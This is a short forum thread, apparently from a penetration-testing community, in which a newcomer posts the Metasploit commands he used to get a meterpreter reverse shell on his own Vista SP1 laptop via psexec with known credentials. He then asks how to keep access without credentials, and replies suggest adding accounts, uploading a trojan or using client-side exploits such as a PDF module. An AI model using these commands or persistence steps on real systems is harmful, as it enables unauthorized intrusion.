metasploit and vista sp1

[halfdone]

Hi Im quite new with metasploit.

Iv been trying to hack in to my vista sp1 laptop. I did it like this and ti worked.

Code:

cd /pentest/exploits/framework3
msfconsole
use windows/smb/psexec
set RHOST 192.168.1.38 (target)
set SMBUser username
set SMBPass pass
show options
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.33 (me)
exploit

So the question is how can I maintain access to my laptop using metasploit so that I dont need to know username and pass.

[purehate]

Once you have a shell you can add a user or you can try one of the add user payloads. Then connect back to the victim with psexec or something like that.

[halfdone]

I mean situation when I dont know user name or password target.

[sickness]

Simply use an exploit to get a meterpreter session on the remote PC than just add username/pass or upload a trojan

[halfdone]

is there any good tutorial for that, which exploit/payload to use? Iv used windows/metepreter/reverse_tcp

but which exploit psexec needs username and pass

[purehate]

psexec is not a exploit. Its a windows commend line tool that allows you to connect to windows box's in a legit way once you have gained a user name and password or added one via another exploit. If you do not know the user name and password you will need to find a exploit which works with out them. Generally a client side attack is the best approach for new operating systems.

[halfdone]

Iv tried many of exploits, but I havent found any of these working with vista sp1.

Iv been following many guides like this http://www.securitytube.net/Client-S...oit-video.aspx

Ideas which exploit to use?

[purehate]

As I said in my previous post there are many client side attacks which work fine against vista.

[halfdone]

You mean like this windows/fileformat/adobe_pdf_embedded_exe

please show me a example

[spudgunman]

google : How hack a remote system using Metasploit

and search you tube plenty of videos on the topic.